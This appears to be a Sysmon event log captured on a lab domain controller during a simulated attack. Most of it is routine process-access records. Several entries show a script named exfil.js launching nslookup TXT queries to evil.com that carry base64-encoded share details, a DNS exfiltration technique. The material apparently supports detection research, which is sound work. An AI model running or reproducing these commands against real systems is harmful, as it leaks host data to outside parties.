SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200437Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.664{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200436Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.664{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17BF-629A-7740-000000005F02}2952C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200435Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.664{2E1864BB-17A1-629A-783D-000000005F02}55527200C:\Windows\System32\WScript.exe{2E1864BB-17BF-629A-7740-000000005F02}2952C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200434Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.667{2E1864BB-17BF-629A-7740-000000005F02}2952C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljaj.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000200433Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.648{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlwadhy.tmpMD5=761C32825E612E802625B3B432A8B214,SHA256=93B655C823F758E66012CC507AD76996E6991D3C8795548139308F047C0D31E1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000200432Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.632{2E1864BB-17BF-629A-7540-000000005F02}56244036C:\Windows\system32\conhost.exe{2E1864BB-17BF-629A-7640-000000005F02}2328C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200431Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.632{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200430Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.632{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200429Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.632{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200428Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.632{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17BF-629A-7640-000000005F02}2328C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200427Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.632{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200426Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.632{2E1864BB-17BF-629A-7440-000000005F02}53645824C:\Windows\system32\cmd.exe{2E1864BB-17BF-629A-7640-000000005F02}2328C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200425Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.636{2E1864BB-17BF-629A-7640-000000005F02}2328C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BF-629A-7440-000000005F02}5364C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwadhy.tmp 2>&1 10341000x8000000000000000200424Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.617{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17BF-629A-7540-000000005F02}5624C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200423Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.617{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BF-629A-7540-000000005F02}5624C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200422Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.614{2E1864BB-17BF-629A-7540-000000005F02}56244036C:\Windows\system32\conhost.exe{2E1864BB-17BF-629A-7440-000000005F02}5364C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200421Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.595{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17BF-629A-7540-000000005F02}5624C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200420Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.595{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200419Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.595{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200418Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.595{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200417Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.595{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200416Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.595{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17BF-629A-7440-000000005F02}5364C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200415Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.579{2E1864BB-17A1-629A-783D-000000005F02}55525752C:\Windows\System32\WScript.exe{2E1864BB-17BF-629A-7440-000000005F02}5364C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200414Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.594{2E1864BB-17BF-629A-7440-000000005F02}5364C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwadhy.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000200413Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.579{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlnkkq.tmpMD5=1D1CCA53E4DF780302A6C1C8BFFFFD37,SHA256=3E9BA274CFCD18E7F9C724A3CED552A6AAA905F20D03820BE6FCA23A34DF3C9F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000200412Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.564{2E1864BB-17BF-629A-7240-000000005F02}20687952C:\Windows\system32\conhost.exe{2E1864BB-17BF-629A-7340-000000005F02}3976C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200411Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.549{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200410Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.549{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17BF-629A-7340-000000005F02}3976C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200409Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.549{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200408Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.549{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200407Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.549{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200406Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 